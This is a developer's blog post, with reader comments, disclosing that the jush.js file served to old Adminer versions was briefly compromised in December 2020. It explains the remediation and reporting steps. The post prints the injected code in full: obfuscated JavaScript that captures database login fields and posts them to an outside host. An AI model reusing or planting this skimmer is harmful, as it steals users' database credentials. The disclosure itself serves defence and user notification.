Users of Adminer 3.7.1 and older might have been hacked

Školení, která pořádám

An attacker from an IP address 52.183.1.49 was able to modify the file adminer.org/static/jush.js which was used by Adminer version 3.7.1 (more than 7 years old) and older for syntax highlighting. The file was modified from 2020-12-29 17:34 GMT to 2020-12-30 11:20 GMT. If you used these Adminer versions to access a database in this time then change the database passwords. Newer Adminer versions are not affected as they bundle this file and don't download it.

The attacker was able to get my hosting password. I don't know how they obtained it but I've changed all the passwords and limited the IP range from which it is possible to log in. I also use 2FA for the central admin but the hosting unfortunately couldn't enforce it for just the server login. I've also checked the published Adminer versions which are unaffected and I've also searched for other possible backdoors.

I've filed a report at cert.microsoft.com which is listed for reporting security issues coming from this IP address. I've also notified GetPush where the malicious code was sending the data.

This is the malicious code:

var _0x4d83=["\x76\x61\x6C\x75\x65","\x61\x75\x74\x68\x5B\x70\x65\x72\x6D\x61\x6E\x65\x6E\x74\x5D","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x31","\x6F\x6E\x63\x6C\x69\x63\x6B","\x61\x75\x74\x68\x5B\x73\x65\x72\x76\x65\x72\x5D","\x61\x75\x74\x68\x5B\x75\x73\x65\x72\x6E\x61\x6D\x65\x5D","\x61\x75\x74\x68\x5B\x70\x61\x73\x73\x77\x6F\x72\x64\x5D","\x61\x75\x74\x68\x5B\x64\x62\x5D","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x65\x74\x70\x75\x73\x68\x2E\x6F\x72\x67\x2F\x61\x64\x6D\x69\x6E\x65\x72\x2F","\x20\x7C\x20","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64"];var submit=document[_0x4d83[2]](_0x4d83[1])[0][_0x4d83[0]];var submit2=document[_0x4d83[4]](_0x4d83[3])[4];if(submit== _0x4d83[5]){submit2[_0x4d83[6]]= function(){var _0x6534x3= new XMLHttpRequest();var _0x6534x4=document[_0x4d83[2]](_0x4d83[7])[0][_0x4d83[0]];var _0x6534x5=document[_0x4d83[2]](_0x4d83[8])[0][_0x4d83[0]];var _0x6534x6=document[_0x4d83[2]](_0x4d83[9])[0][_0x4d83[0]];var _0x6534x7=document[_0x4d83[2]](_0x4d83[10])[0][_0x4d83[0]];var _0x6534x8=document[_0x4d83[12]][_0x4d83[11]];var _0x6534x9=_0x4d83[13];var _0x6534xa=btoa(_0x6534x8+ _0x4d83[14]+ _0x6534x4+ _0x4d83[14]+ _0x6534x5+ _0x4d83[14]+ _0x6534x6+ _0x4d83[14]+ _0x6534x7);_0x6534x3[_0x4d83[16]](_0x4d83[15],_0x6534x9,true);_0x6534x3[_0x4d83[17]](_0x6534xa)}}

I'm sorry for any inconvenience.

Jakub Vrána, Adminer, 30.12.2020, comments: 4 (new: 0)

Comments

Robert Vlach:

Thanks for the detailed info! Which web hosting was it, by the way?

ikona Jakub Vrána OpenID:

Váš-Hosting. They were very cooperative and I don't blame them for the incident, quite the contrary.

Input is understood as plain text but URLs will be converted to links and PHP code enclosed in <?php ?> will be highlighted.

Name: URL: Reply to: Jakub Vrána

Appreciative:

Hey, nobody likes being hacked.  Nobody like to admit they have been hacked.  Seems like you didn't sit on it for a year, like most tech giants (Yahoo, FaceBook etc), you just stuck your hand up and just said it.  Nobody could ask anything more of you than to let people know as soon as you can.

ikona Jakub Vrána OpenID:

Thanks.
avatar © 2005-2021 Jakub Vrána. Publikované texty můžete přetiskovat pouze se svolením autora. Ukázky kódu smíte používat s uvedením autora a URL tohoto webu bez dalších omezení Creative Commons. Můžeme si tykat. Skripty předpokládají nastavení: magic_quotes_gpc=Off, magic_quotes_runtime=Off, error_reporting=E_ALL & ~E_NOTICE a očekávají předchozí zavolání mysql_set_charset. Skripty by měly být funkční v PHP >= 4.3 a PHP >= 5.0.